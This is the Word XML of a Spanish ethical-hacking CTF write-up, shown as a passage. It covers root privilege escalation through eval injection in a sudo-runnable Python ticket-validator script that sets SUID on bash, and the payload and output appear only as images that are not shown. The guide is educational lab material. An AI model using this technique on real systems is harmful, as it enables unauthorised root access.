      <w:r w:rsidRPr="006E2852">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ya tenemos la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E2852">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E2852">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> para un usuario normal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598B504E" w14:textId="33585EFF" w:rsidR="00FA6809" w:rsidRPr="00206A93" w:rsidRDefault="00FA6809" w:rsidP="00FA6809">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc138803587"/>
      <w:r w:rsidRPr="00206A93">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Escalada de privilegios para ser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206A93">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22C35E58" w14:textId="77777777" w:rsidR="00CA0FE8" w:rsidRPr="00CA0FE8" w:rsidRDefault="00CA0FE8" w:rsidP="00FA6809">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E13B11" w14:textId="6152F26E" w:rsidR="00BA520F" w:rsidRDefault="00CA0FE8" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Ahora </w:t>
      </w:r>
      <w:r w:rsidR="00BA520F">
        <w:t>si ingresamos el comando sudo -l tenemos el siguiente mensaje:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07746808" w14:textId="0F177038" w:rsidR="00BA520F" w:rsidRDefault="00BA520F" w:rsidP="00FA6809">
      <w:r w:rsidRPr="00BA520F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1138D5AF" wp14:editId="65909268">
            <wp:extent cx="5400040" cy="578485"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1174091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9113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0855" w14:textId="6BAE95A0" w:rsidR="00BA520F" w:rsidRDefault="00BA520F" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Entonces vamos a inspeccionar el código que está en la ruta: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA520F">
        <w:t>/opt/skytrain_inc/ticketValidator.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8247B0" w14:textId="11087B7D" w:rsidR="00BA520F" w:rsidRDefault="008F15EB" w:rsidP="00FA6809">
      <w:r w:rsidRPr="008F15EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D76223C" wp14:editId="72C4449E">
            <wp:extent cx="4910445" cy="6817112"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3175"/>
            <wp:docPr id="2738634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63405" name="Imagen 1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9039" cy="682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E7AA" w14:textId="6FADAF47" w:rsidR="008F15EB" w:rsidRDefault="008F15EB" w:rsidP="00FA6809"/>
    <w:p w14:paraId="71BB92A1" w14:textId="66C6F1C3" w:rsidR="008F15EB" w:rsidRDefault="00DA3052" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Si analizamos el código, vemos que la primera condicional es que al ingresar un archivo </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>tiene que tener</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> extensión .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>md</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, caso contrario se cierra el programa con un mensaje de “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wrong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">”. Luego, una vez ingresado nos pide que debe tener de manera obligatoria 3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> por línea:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A46FBDC" w14:textId="0EAA6C03" w:rsidR="00DA3052" w:rsidRDefault="00DA3052" w:rsidP="00DA3052">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sktrain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Inc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E234ECF" w14:textId="064C3093" w:rsidR="00DA3052" w:rsidRDefault="00DA3052" w:rsidP="00DA3052">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">## Ticket </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E2E5C7C" w14:textId="51E831C6" w:rsidR="00DA3052" w:rsidRDefault="00DA3052" w:rsidP="00DA3052">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">__Ticket </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:_</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67538622" w14:textId="09DEC97F" w:rsidR="00FA6809" w:rsidRDefault="00A51054" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Todo eso debemos ponerlo en el archivo que vamos a crear, para este ejercicio le pondremos el nombre de </w:t>
      </w:r>
      <w:r w:rsidRPr="00A51054">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hola.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C569D5C" w14:textId="3F57FAAD" w:rsidR="00A51054" w:rsidRDefault="00A51054" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Ahora, lo que vamos hacer es evaluar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x.startswith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de manera que quede de la siguiente manera:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7FE705" w14:textId="3D1F1585" w:rsidR="00A51054" w:rsidRDefault="00A51054" w:rsidP="00FA6809">
      <w:r w:rsidRPr="00A51054">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="567F34EE" wp14:editId="14E5FA1F">
            <wp:extent cx="5400040" cy="837565"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="121938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880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73A6" w14:textId="77777777" w:rsidR="00A51054" w:rsidRDefault="00A51054" w:rsidP="00FA6809"/>
    <w:p w14:paraId="1F5AB540" w14:textId="4731A088" w:rsidR="00FA6809" w:rsidRDefault="00A51054" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Finalmente, como tenemos el método </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A56A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, podemos concatenarlo importando la librería </w:t>
      </w:r>
      <w:r w:rsidRPr="005A56A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, de modo que se estaría ejecutando también a la par. </w:t>
      </w:r>
      <w:r w:rsidR="005A56A4">
        <w:t xml:space="preserve">Como podemos ejecutar el script como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A56A4">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A56A4">
        <w:t xml:space="preserve">, una vía potencial es asignarle el permiso SUID a la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A56A4">
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A56A4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009908EE">
        <w:t xml:space="preserve"> Ahora vamos a ejecutar el script y el resultado será el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD9135E" w14:textId="3926A697" w:rsidR="009908EE" w:rsidRPr="00FA6809" w:rsidRDefault="009908EE" w:rsidP="00FA6809">
      <w:r w:rsidRPr="009908EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AD1CE05" wp14:editId="57BB8F56">
            <wp:extent cx="5400040" cy="1499870"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="6826914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1494" name="Imagen 1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6884" w14:textId="1985DAFA" w:rsidR="007A46D9" w:rsidRPr="007A46D9" w:rsidRDefault="007A46D9" w:rsidP="007A46D9">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A46D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ya tenemos la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A46D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A46D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> para el usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A46D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A46D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A62E63" w14:textId="3CFEAEA3" w:rsidR="0051639D" w:rsidRDefault="0051639D" w:rsidP="0051639D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574E746A" w14:textId="773BFEC3" w:rsidR="0051639D" w:rsidRDefault="0051639D" w:rsidP="0051639D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77D4E849" w14:textId="77777777" w:rsidR="0051639D" w:rsidRDefault="0051639D" w:rsidP="0051639D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE03A4C" w14:textId="77777777" w:rsidR="0051639D" w:rsidRDefault="0051639D" w:rsidP="0051639D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E294029" w14:textId="77777777" w:rsidR="0051639D" w:rsidRDefault="0051639D" w:rsidP="0051639D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620E3A8C" w14:textId="528A1913" w:rsidR="00A56118" w:rsidRPr="00A56118" w:rsidRDefault="00A56118" w:rsidP="00160F61">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A56118" w:rsidRPr="00A56118">
      <w:headerReference w:type="default" r:id="rId58"/>
      <w:footerReference w:type="default" r:id="rId5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AC48" w14:textId="77777777" w:rsidR="00721247" w:rsidRDefault="00721247" w:rsidP="004C2027">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="28C1304C" w14:textId="77777777" w:rsidR="00721247" w:rsidRDefault="00721247" w:rsidP="004C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ns Serif Shaded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Times Sans Serif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randview">
    <w:altName w:val="Calibri"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00002C7" w:usb1="00000002" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019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Selawik Semi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B6C7" w14:textId="464CC48F" w:rsidR="00424318" w:rsidRDefault="001D0525">
    <w:pPr>
      <w:pStyle w:val="Piedepgina"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r w:rsidRPr="00206A93">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
        <w:sz w:val="50"/>
        <w:szCs w:val="5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D568BD" wp14:editId="6651F8C9">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>0</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>73872</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7543800" cy="704850"/>
              <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
              <wp:wrapNone/>
              <wp:docPr id="1223538465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7048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CA9DB4" w14:textId="77777777" w:rsidR="001D0525" w:rsidRPr="00A56118" w:rsidRDefault="001D0525" w:rsidP="001D0525">
                          <w:pPr>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"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rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                              <w:sz w:val="36"/>
                              <w:szCs w:val="36"/>
                              <w:lang w:val="es-ES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B91055" wp14:editId="28B49447">
                                <wp:extent cx="270934" cy="187375"/>
                                <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                                <wp:docPr id="1448789777" name="Imagen 1448789777" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza me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4267720" name="Imagen 654267720" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza media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283210" cy="195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Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                              <w:sz w:val="36"/>
                              <w:szCs w:val="36"/>
                              <w:lang w:val="es-ES"/>
                            </w:rPr>
                            <w:t xml:space="preserve">  </w:t>
                          </w:r>
                          <w:r w:rsidRPr="00A56118">
                            <w:rPr>
                              <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                              <w:sz w:val="36"/>
                              <w:szCs w:val="36"/>
                              <w:lang w:val="es-ES"/>
                            </w:rPr>
                            <w:t>Para más contenido visita mi canal de YouTube: HackeM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568BD" id="_x0000_s1044" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:5.8pt;width:594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" fillcolor="black [3213]" strokecolor="#09101d [484]" strokeweight="1pt">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="16CA9DB4" w14:textId="77777777" w:rsidR="001D0525" w:rsidRPr="00A56118" w:rsidRDefault="001D0525" w:rsidP="001D0525">
                    <w:pPr>
                      <w:jc w:val="center"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                        <w:sz w:val="36"/>
                        <w:szCs w:val="36"/>
                        <w:lang w:val="es-ES"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                        <w:sz w:val="36"/>
                        <w:szCs w:val="36"/>
                        <w:lang w:val="es-ES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B91055" wp14:editId="28B49447">
                          <wp:extent cx="270934" cy="187375"/>
                          <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                          <wp:docPr id="1448789777" name="Imagen 1448789777" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza me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54267720" name="Imagen 654267720" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza media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283210" cy="195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Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                        <w:sz w:val="36"/>
                        <w:szCs w:val="36"/>
                        <w:lang w:val="es-ES"/>
                      </w:rPr>
                      <w:t xml:space="preserve">  </w:t>
                    </w:r>
                    <w:r w:rsidRPr="00A56118">
                      <w:rPr>
                        <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                        <w:sz w:val="36"/>
                        <w:szCs w:val="36"/>
                        <w:lang w:val="es-ES"/>
                      </w:rPr>
                      <w:t>Para más contenido visita mi canal de YouTube: HackeMate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5F6FCFAF" w14:textId="77777777" w:rsidR="00424318" w:rsidRDefault="004243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3D33" w14:textId="77777777" w:rsidR="00721247" w:rsidRDefault="00721247" w:rsidP="004C2027">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1D21A16C" w14:textId="77777777" w:rsidR="00721247" w:rsidRDefault="00721247" w:rsidP="004C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716D" w14:textId="5DFA490B" w:rsidR="001D0525" w:rsidRDefault="001D0525">
    <w:pPr>
      <w:pStyle w:val="Encabezado"/>
    </w:pPr>
    <w:r w:rsidRPr="00206A93">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
        <w:sz w:val="50"/>
        <w:szCs w:val="5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C771C" wp14:editId="140D370A">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:align>left</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-449368</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7543800" cy="501614"/>
              <wp:effectExtent l="0" t="0" r="19050" b="13335"/>
              <wp:wrapNone/>
              <wp:docPr id="1014992381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50161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53FA8" w14:textId="77777777" w:rsidR="001D0525" w:rsidRPr="00C6799C" w:rsidRDefault="001D0525" w:rsidP="001D0525">
                          <w:pPr>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                              <w:sz w:val="48"/>
                              <w:szCs w:val="48"/>
                              <w:lang w:val="es-ES"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                              <w:sz w:val="48"/>
                              <w:szCs w:val="48"/>
                              <w:lang w:val="es-ES"/>
                            </w:rPr>
                            <w:t>Introducción al Hacking Ético</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="1A27D305" w14:textId="77777777" w:rsidR="001D0525" w:rsidRPr="00C6799C" w:rsidRDefault="001D0525" w:rsidP="001D0525">
                          <w:pPr>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                              <w:sz w:val="48"/>
                              <w:szCs w:val="4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8C771C" id="_x0000_s1043" style="position:absolute;margin-left:0;margin-top:-35.4pt;width:594pt;height:39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" fillcolor="black [3213]" strokecolor="#09101d [484]" strokeweight="1pt">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="30C53FA8" w14:textId="77777777" w:rsidR="001D0525" w:rsidRPr="00C6799C" w:rsidRDefault="001D0525" w:rsidP="001D0525">
                    <w:pPr>
                      <w:jc w:val="center"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                        <w:sz w:val="48"/>
                        <w:szCs w:val="48"/>
                        <w:lang w:val="es-ES"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                        <w:sz w:val="48"/>
                        <w:szCs w:val="48"/>
                        <w:lang w:val="es-ES"/>
                      </w:rPr>
                      <w:t>Introducción al Hacking Ético</w:t>
                    </w:r>
                  </w:p>
                  <w:p w14:paraId="1A27D305" w14:textId="77777777" w:rsidR="001D0525" w:rsidRPr="00C6799C" w:rsidRDefault="001D0525" w:rsidP="001D0525">
                    <w:pPr>
                      <w:jc w:val="center"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                        <w:sz w:val="48"/>
                        <w:szCs w:val="48"/>
                        <w:lang w:val="es-E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46BED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51300CB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E70B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B9CD8D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1A6A5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F2BE0BE8"/>
    <w:lvl w:ilvl="0" w:tplc="523E71FA">
      <w:start w:val="10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942759056">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="834225110">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="856121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27"/>
    <w:rsid w:val="0002707D"/>
    <w:rsid w:val="00087C7E"/>
    <w:rsid w:val="000C007C"/>
    <w:rsid w:val="00160F61"/>
    <w:rsid w:val="00173B51"/>
    <w:rsid w:val="001D0525"/>
    <w:rsid w:val="00206A93"/>
    <w:rsid w:val="00274609"/>
    <w:rsid w:val="002952EF"/>
    <w:rsid w:val="002B1519"/>
    <w:rsid w:val="00424318"/>
    <w:rsid w:val="00440990"/>
    <w:rsid w:val="0046412D"/>
    <w:rsid w:val="004A5B45"/>
    <w:rsid w:val="004B0955"/>
    <w:rsid w:val="004C2027"/>
    <w:rsid w:val="004D731F"/>
    <w:rsid w:val="0051639D"/>
    <w:rsid w:val="00577C2D"/>
    <w:rsid w:val="0058283C"/>
    <w:rsid w:val="005A56A4"/>
    <w:rsid w:val="005E1098"/>
    <w:rsid w:val="005F268B"/>
    <w:rsid w:val="00611C6B"/>
    <w:rsid w:val="006450C7"/>
    <w:rsid w:val="00661DF7"/>
    <w:rsid w:val="00663D49"/>
    <w:rsid w:val="00697D45"/>
    <w:rsid w:val="006E2852"/>
    <w:rsid w:val="006E2B5B"/>
    <w:rsid w:val="006F0C4E"/>
    <w:rsid w:val="006F5791"/>
    <w:rsid w:val="006F6DC0"/>
    <w:rsid w:val="00721247"/>
    <w:rsid w:val="007313E7"/>
    <w:rsid w:val="00763684"/>
    <w:rsid w:val="007659EE"/>
    <w:rsid w:val="00795925"/>
    <w:rsid w:val="007A24E7"/>
    <w:rsid w:val="007A46D9"/>
    <w:rsid w:val="007D0216"/>
    <w:rsid w:val="007D5522"/>
    <w:rsid w:val="0087161E"/>
    <w:rsid w:val="008B5FA3"/>
    <w:rsid w:val="008F15EB"/>
    <w:rsid w:val="008F4187"/>
    <w:rsid w:val="00923356"/>
    <w:rsid w:val="009452D8"/>
    <w:rsid w:val="009908EE"/>
    <w:rsid w:val="009C3289"/>
    <w:rsid w:val="00A24C53"/>
    <w:rsid w:val="00A47772"/>
    <w:rsid w:val="00A51054"/>
    <w:rsid w:val="00A56118"/>
    <w:rsid w:val="00A6207F"/>
    <w:rsid w:val="00A91712"/>
    <w:rsid w:val="00A95022"/>
    <w:rsid w:val="00AB7425"/>
    <w:rsid w:val="00AF0C43"/>
    <w:rsid w:val="00AF7D65"/>
    <w:rsid w:val="00B07C54"/>
    <w:rsid w:val="00B20ED4"/>
    <w:rsid w:val="00B27B15"/>
    <w:rsid w:val="00BA4552"/>
    <w:rsid w:val="00BA520F"/>
    <w:rsid w:val="00C0138E"/>
    <w:rsid w:val="00C4061D"/>
    <w:rsid w:val="00C6799C"/>
    <w:rsid w:val="00C7172F"/>
    <w:rsid w:val="00CA0FE8"/>
    <w:rsid w:val="00CF4921"/>
    <w:rsid w:val="00D2645F"/>
    <w:rsid w:val="00D41F0F"/>
    <w:rsid w:val="00DA3052"/>
    <w:rsid w:val="00E3587F"/>
    <w:rsid w:val="00E53B6E"/>
    <w:rsid w:val="00EC0C62"/>
    <w:rsid w:val="00ED18EF"/>
    <w:rsid w:val="00EF35DB"/>
    <w:rsid w:val="00F02BA7"/>
    <w:rsid w:val="00F5411F"/>
    <w:rsid w:val="00F71477"/>
    <w:rsid w:val="00FA6809"/>
    <w:rsid w:val="00FB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85452"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C4D86E70-E32B-40C6-AB25-92E738BA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6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2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027"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004C2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027"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo1Car">
    <w:name w:val="Título 1 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FA6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B5FA3"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0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B5FA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5F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283C"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="t-14">
    <w:name w:val="t-14"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00A9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paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C40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hackemateperu/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.instagram.com/hackemate.pe/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="media/hdphoto3.wdp"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png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gianpaul-custodio-chavarr&#237;a" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png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image" Target="media/image31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youtube.com/@HackeMate" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/hackemateperu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microsoft.com/office/2007/relationships/hdphoto" Target="media/hdphoto6.wdp"/><Relationship 